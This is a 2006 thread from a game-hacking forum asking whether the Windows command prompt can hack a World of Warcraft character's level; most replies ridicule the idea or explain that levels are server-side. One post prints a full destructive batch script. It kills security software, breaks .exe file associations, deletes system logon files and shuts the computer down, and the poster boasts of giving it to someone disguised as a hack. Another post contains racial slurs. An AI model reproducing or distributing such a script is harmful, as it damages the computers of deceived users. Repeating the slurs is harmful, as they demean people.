Blizzhackers

We're Still Here

* Login     * FAQ    * Search

Join us on IRC: #bh@irc.synirc.net (or Mibbit Web IRC)


MuleFactory


It is currently Sat Apr 19, 2014 11:05 pm


All times are UTC [ DST ]





Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 31 posts ]  Go to page 1, 2, 3  Next
Author Message
 Post subject: how to hack with CMD ?
PostPosted: Wed Jul 05, 2006 9:38 pm 
 
User
User

Joined: Wed Jul 05, 2006 9:18 pm
Is it possible and can and can you hack your lvl with CMD?

Top
 Profile  
 Post subject:
PostPosted: Thu Jul 06, 2006 12:20 pm 
 
User
User
User avatar

Joined: Sat Mar 25, 2006 12:51 pm
hahahahahah. no }:p

Top
 Profile  
 Post subject:
PostPosted: Thu Jul 06, 2006 12:38 pm 
 
User
User
User avatar

Joined: Thu Dec 11, 2003 4:52 am
Location: Rio de Janeiro
Yes.

_________________
Image

Top
 Profile  
 Post subject:
PostPosted: Thu Jul 06, 2006 4:56 pm 
 
User
User
User avatar

Joined: Sun Feb 12, 2006 7:39 am
Location: Vande's basement.
This reminds me of a guy who tried to convince me he modded Halo with cmd. With the "break into halo mainframe" command.

Top
 Profile  
 Post subject:
PostPosted: Sat Jul 08, 2006 7:28 pm 
 
User
User

Joined: Wed Jul 05, 2006 9:18 pm
but listen no1 ansered really my question exept 1 guy plz tell me not about another GAME this 1 plz

Top
 Profile  
 Post subject:
PostPosted: Sun Jul 09, 2006 2:31 am 
 
User
User
User avatar

Joined: Thu Feb 17, 2005 11:33 pm
rofl there was this wigger guy @ school and I was like FUCK YOU I'M GONNA HACK YOUR COMP... and he was like "pft yeah right nigga" so I opened up cmd and was like THATS IT YOU PISSED ME OFF! SEE THERE IS YOUR IP I HACKED IT TY CREDIT CARD and he was like WTF BITCH

funny stuff


but yeah, you have to be superduper skilled to hax on cmd... I dont' think you'd be able to do it if you werent even sure that you could in the first place.

_________________
BaconCube wrote:
yeah, it's like in one you kill things to level, in the other you kill things to level! JUST LIKE WoW OMG

Top
 Profile  
 Post subject:
PostPosted: Sun Jul 09, 2006 3:23 am 
 
User
User
User avatar

Joined: Sun Feb 12, 2006 7:39 am
Location: Vande's basement.
No, its not possible.

Levels are all server side. And CMD is used to configure your computer. If hacking your level was possible you would see alot of lvl 225s running around.

Top
 Profile  
 Post subject:
PostPosted: Sun Jul 09, 2006 5:14 am 
 
User
User

Joined: Sat Jun 17, 2006 3:36 am
if u wanna feel special open it up and type

The Matrix Has You.......

Top
 Profile  
 Post subject:
PostPosted: Sun Jul 09, 2006 9:40 am 
 
User
User

Joined: Wed May 03, 2006 2:42 pm
CMD isnt a "hacking" program, its just an implementation of the DOs promnt inside windows.

just because you can type a few commands like ping or tracert in a CMD promnt dosent make you a 1337 hax0rz

Top
 Profile  
 Post subject:
PostPosted: Sun Jul 09, 2006 10:31 am 
 
User
User
User avatar

Joined: Sat Mar 25, 2006 12:51 pm
Est40e wrote:
if u wanna feel special open it up and type

The Matrix Has You.......

you have been using letmerule :P

Top
 Profile  
 Post subject:
PostPosted: Sun Jul 09, 2006 2:06 pm 
 
User
User
User avatar

Joined: Thu Jul 06, 2006 12:44 pm
Gilded[Shadow] wrote:
rofl there was this wigger guy @ school and I
but yeah, you have to be superduper skilled to hax on cmd... I dont' think you'd be able to do it if you werent even sure that you could in the first place.

Uhh, let me correct you there, you can be as dumb as a cow.
Everything important in WoW such as Gold, and Levels, are kept serverside.

Top
 Profile  
 Post subject: gfdg
PostPosted: Sun Jul 09, 2006 3:46 pm 
 
User
User
User avatar

Joined: Fri Jan 14, 2005 7:55 am
You can program in dos. Is it possible? Well now that depends the data is server side youll have to find some form of packet exploit....good luck with that.

Top
 Profile  
 Post subject:
PostPosted: Mon Jul 10, 2006 9:09 am 
 
User
User

Joined: Mon May 15, 2006 8:36 am
hmmm can you read HEX? if so, can you type HEX? if so, can you type HEX really fast? then there is indeed a chance that you can indeed hack wow commandline :P

you can make yourself a program where HEX will be interpreted as code. Then you can on the fly hack the process wow.exe :)

basicly? no you cant hack through CMD, just like the rest pointed out. CMD is a DOS emulation / console window. It has no way of reading memory, adjusting memory, hooking into other processes.

Top
 Profile  
 Post subject:
PostPosted: Mon Jul 10, 2006 9:35 am 
 
User
User
User avatar

Joined: Sun Feb 12, 2006 7:39 am
Location: Vande's basement.
Only thing I have been using dos for lately is this:

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


Just to screw with some punk, told him it was a hack he could use.

Top
 Profile  
 Post subject:
PostPosted: Tue Jul 11, 2006 12:51 am 
 
User
User

Joined: Mon Jul 10, 2006 9:31 pm
you can hack with telnet, which is almost cmd

Top
 Profile  
Display posts from previous:  Sort by  
Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 31 posts ]  Go to page 1, 2, 3  Next

All times are UTC [ DST ]


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
cron